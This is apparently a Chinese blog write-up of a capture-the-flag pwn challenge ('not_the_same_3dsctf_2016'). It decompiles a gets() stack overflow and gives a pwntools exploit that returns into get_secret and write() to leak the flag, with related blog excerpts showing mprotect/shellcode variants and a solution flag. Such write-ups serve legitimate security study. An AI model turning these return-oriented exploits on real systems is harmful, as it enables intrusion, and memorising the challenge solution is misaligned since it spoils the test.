BUUCTF-not_the_same_3dsctf_2016

最新推荐文章于 2023-12-03 16:46:29 发布
最新推荐文章于 2023-12-03 16:46:29 发布
阅读量125 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: c++ 安全 pwn python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arraylocalhost/article/details/127024174
版权

1.checksec基本操作

只开启了NX保护

2.IDA

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[45]; // [esp+Fh] [ebp-2Dh] BYREF

  printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... ");
  gets(v4); //栈溢出
  return 0;
}

跟进v4

 

offset=0x3c

get_secret 

int get_secret()
{
  int v0; // esi

  v0 = fopen("flag.txt", &unk_80CF91B);
  fgets(&fl4g, 45, v0);
  return fclose(v0);
}

flag被写在bss段

利用:

  1. 栈溢出覆盖返回地址为get_secret地址
  2. 通过write打印flag 

3.EXP

from pwn import *


r = remote("node4.buuoj.cn",25171)

elf = ELF("./17notthesame3dsctf")

#params
flag_func_addr = elf.symbols['get_secret']
flag_addr=0x80ECA2D

#attack
payload=b'M' * 45 + p32(flag_func_addr) + p32(elf.sym['write']) + b'M'*4 + p32(1) + p32(flag_addr) + p32(100)
r.sendline(payload)

r.interactive()

Rt1Text
关注
专栏目录
ts9_annot_arrow_hvplot PyViz interacti_bokeh_STL_seasonal_decomp_HodrickP_KPSS_F-stati_Box-Cox_Ljung
Linli522362242的专栏
11-18 6317
ts9_annot_arrow_interactive bokeh_STL(add:cycle +trend+residual normality)_seasonal_decomp(add&multiplicative)_Hodrick-Prescott(add:cycle trend)_KPSS_F-statistic_Box-Cox_Ljung-Box(autocorrelation:group of lags)_homo同方_heter异方差_Q-Q probabilityPlot freq=None
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 510
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
BUUCTF not_the_same_3dsctf_2016
红叶的博客
10-31 226
本题目本地与远程得用两种方案打。
BUUCTF-PWN-not_the_same_3dsctf_2016
Henlenl的博客
05-19 212
文章目录查看文件信息IDA静态分析exp 查看文件信息 开了个NX保护 IDA静态分析 开始看上去 其实就是利用gets()来溢出的 我们可以 shift+f12 查看字符串 可以看到 flag.txt 这个字符串 我们进去看一看…开始的思路其实是利用gets函数溢出来覆盖返回地址去读出flag,然后利用get_secret函数的输入点造成溢出覆盖返回地址到write函数的地址,打印出unk_80CF91B里面储存flag的内容,但是要知道的是,fgets函数其实是有保护机制的,所以我们利用这个是读
CTF-PWN-buuctf-not_the_same_3dsctf_2016-ROP函数返回到指定位置和ROP-chain的典型使用
serfend's blog
04-20 1532
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:链接:https://pan.baidu.com/s/1Wll80yDkRvz5XMW_xIZRNQ?pwd=uye9 提取码:uye9 答案:flag{c264d02e-6de6-4164-82a6-bdcb6c8ba64f} 总体思路 发现题目存在溢出点,并且给了flag相关的函数 但是此题是静态编译的,有很多其他不必要的函数,可以尝试直接使用ROP-chain方法get-shell 详细步骤 查看文件信
BUUCTF - PWN】not_the_same_3dsctf_2016
古月浪子的博客
03-27 1580
checksec一下,可以栈溢出 IDA打开看看,直接可以溢出 有一个后门函数,会把flag放在bss段上 程序有write函数,通过rop把flag打印出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sl=la...
buuctf之 not_the_same
qq_42728977的博客
02-19 638
题目:not_the_same_3dsctf_2016 环境:ubuntu14 漏洞点:栈溢出、mprotect、shellcode 思路:使用mprotect更改内存权限,通过栈溢出更改程序流程,读入shellcode并执行 参考链接: get_started_3dsctf_2016-Pwn get_started_3dsctf_2016-Pwn 上来就这,感觉这个题很简单啊。 再看看函数列表...
[BUUCTF-pwn]——not_the_same_3dsctf_2016
Y_peak的博客
02-10 887
not_the_same_3dsctf_2016 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 首先checksec一下,看看32位程序 在IDA中,发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp shift+F12看下,发现了flag.txt这种敏感 字符串 找到调用的函数get_secret函数 函数调用后,flag储存在fl4g里面,我们找到fl4g的位置 找到可以输出的write函数 下面我们就可
[BUUCTF]PWN14——not_the_same_3dsctf_2016
mcmuyanga的博客
08-29 2068
[BUUCTF]PWN14——not_the_same_3dsctf_2016 题目网址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 步骤: 例行检查,32位,开启了nx保护 nc一下看看程序大概的执行情况,没看出个所以然 32位ida载入,shift+f12查看程序里的字符串,发现flag.txt 双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置,我们要想办法将这个地
BUUCTFPWN】not_the_same_3dsctf_2016
m0_55368674的博客
01-12 421
BUUCTF - PWN】not_the_same_3dsctf_2016题解
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 573
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
buuctf|pwn-not_the_same_3dsctf_2016-wp
l2645470582_的博客
11-08 320
1.检查保护机制 我们看到开了堆的保护 2.用32为的IDA打开该文件 shift+f12查看关键字符串,我们看到有‘flag.txt’关键字符 我们就查找出后门函数的地址:0x080489A0 我们看到读取flag.txt,注意fgets函数,就是在f14g里面读取45个字符,我们猜测这就是flag 3.我们查看main函数里面有什么 我们看到gets(&v4)有个溢出,我们看到v4地址是0x2D 4.rop ...
[BUUCTF]-PWN:not_the_same_3dsctf_2016解析
最新发布
2301_79326813的博客
12-03 470
答:这里跟exit没有太大关系,不是exit也行,但printf和flag_addr的隔一个是printf函数在32位的调用规则,也就是通过栈传参,64位与32位不同,64位是前6个参数通过寄存器传参,因此payload的书写也不同,这个需要注意。答:printf从缓冲区打印出东西需要满足条件,比如有换行符或缓冲区已满或程序退出,如果不满足条件flag无法被打印出来。答:因为这里没有rbp,在main函数的汇编界面就可以看到程序并没有把rbp推入,所以不用覆盖rbp。问题1:为什么填充45个字符?
[PWN] BUUCTF not_the_same_3dsctf_2016的三种做法
空城惜梦的博客
06-03 519
[PWN] BUUCTF not_the_same_3dsctf_2016的三种做法1.维持函数正常结束(printf打印)payload1(FALSE)payload2(TRUE)2.write打印payload3.修改栈区权限存在疑惑参考wp 按照惯例先checksec一下,发现没有canary和pie 之后用ida查看主要函数main有个gets函数存在栈溢出 函数窗口中有个backdoor函数get_secret,因为这个函数可以读取flag.txt并且通过v0将内容写进fl4g,所以可以想到在
BUUCTF not_the_same
doudoudedi
10-03 390
开始以为是简单的栈溢出发现可以调用的函数很少 而且开启了nx,leak不了libc。这里需要将bss段设置成可读可写可执行,然后跳到bss段执行shellcode 我这里参数中有地址最好使用gadget exp: from pwn import * def debug(): gdb.attach(p) p=process('./notsame') #p=remote('node2.buuoj...
BUUCTF(pwn)not_the_same_3dsctf_2016
半岛铁盒的博客
03-28 259
from pwn import* p=remote('node3.buuoj.cn',29208) get_secret=0x80489a0 flag=0x80eca2d write=0x806e270 payload='a'*0x2d+p32(get_secret)+p32(write)+p32(0)+p32(1)+p32(flag)+p32(45) p.senline(payload) p.interactive() 有疑问的欢迎留言❄
buuctf not_the_same_3dsctf_2016
carol2358的博客
04-16 291
一开始没看到get_secret函数,去用mprotect去做了,结果报错卡住了。 思路是用write把get_serect写到bss里的flag显示出来,write bss就可以。 exp: from pwn import * from LibcSearcher import * context(log_level = 'debug',arch ='i386',os = 'linux'...
文件对比工具Check_Same_File深度评测
资源摘要信息:"Check_Same_File.rar_Same Same" 知识点一:文件比较工具的作用 在计算机操作中,文件比较是一个常见的需求。例如,开发者在进行代码合并时需要确认不同分支的文件是否一致,或者在传输文件后需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值